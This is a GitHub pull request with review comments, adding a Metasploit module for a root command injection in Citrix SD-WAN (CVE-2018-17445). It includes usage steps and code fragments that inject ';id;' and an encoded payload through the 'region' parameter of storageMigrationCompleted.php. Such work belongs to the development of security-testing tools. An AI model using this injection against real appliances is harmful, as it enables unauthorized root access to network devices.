New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add Citrix SD-WAN Command Injection module #11177

Open
wants to merge 1 commit into
base: master
from

Conversation

Projects
None yet
6 participants
@neoleksov
Copy link
Contributor

neoleksov commented Dec 26, 2018

This module exploits an arbitrary command execution vulnerability in Citrix SD-WAN.
This vulnerability can allow an attacker execute arbitrary command with root privileges.
An attacker gained access to the operating system can escalate his privileges to the root's privileges using "sudo -i" command.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use unix/webapp/citrix_command_injection
  • set payload cmd/unix/bind_awk
  • set RHOSTS <r_host>
  • set RPORT <r_port>
  • set SSL <true/false>
  • set LHOST <l_host>
  • set LPORT <l_port>
  • check
  • Verify that the host is vulnerable.
  • run
  • Verify that the module open socket with bash session on l_host:l_port.
'region' => ';id;'
}
)
if res.code == 200 and /uid=/ =~ res.body

This comment has been minimized.

@Green-m

Green-m Dec 27, 2018

Contributor

You do not need to catch it by yourself, the send_request_cgi method would catch the ::Rex::ConnectionError exception and return nil. Moreover, the fail_with is invaild in check method.
Here is my suggestion:

unless res
  print_bad("Could not connect to the web service")
  Exploit::CheckCode::Unknown
end

if res.code == 200 && /uid=/ =~ res.body
  Exploit::CheckCode::Vulnerable
else
  Exploit::CheckCode::Safe
end

This comment has been minimized.

@bcoles

bcoles Dec 28, 2018

Contributor

For a check method, the vprint_* methods should be used rather than `print_*.

Also the arguments for the regex check should be reversed.

  def check
    res = send_request_cgi(
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, 'storageMigrationCompleted.php'),
      'vars_get' => {
        'region' => ';id;'
      }
    )

    unless res
      vprint_bad("Could not connect to the web service")
      return CheckCode::Unknown
    end

    if res.code == 200 && res.body =~ /uid=/
      return CheckCode::Vulnerable
    end

    CheckCode::Safe
  end
'region' => ";#{payload.encoded};"
}
)
rescue ::Rex::ConnectionError

This comment has been minimized.

@Green-m

Green-m Dec 27, 2018

Contributor

See comment above.

@bcoles
Copy link
Contributor

bcoles left a comment

It should be pretty easy to add support for a command stager to this module, by wrapping the send_request_cgi method call in a execute_command method.

@@ -0,0 +1,91 @@
##
# This module requires Metasploit: http://metasploit.com/download

This comment has been minimized.

@bcoles

bcoles Dec 28, 2018

Contributor
Suggested change Beta
# This module requires Metasploit: http://metasploit.com/download
# This module requires Metasploit: https://metasploit.com/download
'References' =>
[
['CVE', '2018-17445'],
['URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17445'],

This comment has been minimized.

@bcoles

bcoles Dec 28, 2018

Contributor

This URL is made redundant by the CVE line above.

Consider adding these instead:

Suggested change Beta
['URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17445'],
['BID', '105711'],
['URL', 'https://support.citrix.com/article/CTX236992']
[
Opt::RPORT(443),
OptString.new('TARGETURI', [true, 'Path to WebService', '/'])
], self.class

This comment has been minimized.

@bcoles

bcoles Dec 28, 2018

Contributor

self.class is redundant here.

Suggested change Beta
], self.class
]

@wvu-r7 wvu-r7 changed the title Add Citrix Command Injection module Add Citrix SD-WAN Command Injection module Jan 3, 2019

@wvu-r7
Copy link
Contributor

wvu-r7 left a comment

Since this is a vulnerability in Citrix SD-WAN, consider renaming the module to match. Citrix makes a lot of products.

@jrobles-r7 jrobles-r7 self-assigned this Jan 4, 2019

@jrobles-r7

This comment has been minimized.

Copy link
Contributor

jrobles-r7 commented Jan 9, 2019

Hello. I tried a few downloads from citrix but I wasn't able to get this module to work. Could you provide a link to a specific download that is known to work? Preferably an ova.

Please add module documentation as well.

@neoleksov neoleksov force-pushed the neoleksov:citrix_command_injection branch from ac6ecbe to e3b643b Jan 16, 2019

@neoleksov

This comment has been minimized.

Copy link
Contributor

neoleksov commented Jan 16, 2019

Hello. I tried a few downloads from citrix but I wasn't able to get this module to work. Could you provide a link to a specific download that is known to work? Preferably an ova.

Hello. I used AWS, but only the latest version is available now, that's not vulnerable to this attack.

@neoleksov neoleksov force-pushed the neoleksov:citrix_command_injection branch from e3b643b to 5b8545c Jan 16, 2019

@wvu-r7

wvu-r7 approved these changes Jan 16, 2019

@jrobles-r7

This comment has been minimized.

Copy link
Contributor

jrobles-r7 commented Jan 16, 2019

@neoleksov do you still have access to a vulnerable instance? If you do please send a pcap of the module working to msfdev [at] metasploit com.

Also, please add module documentation.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment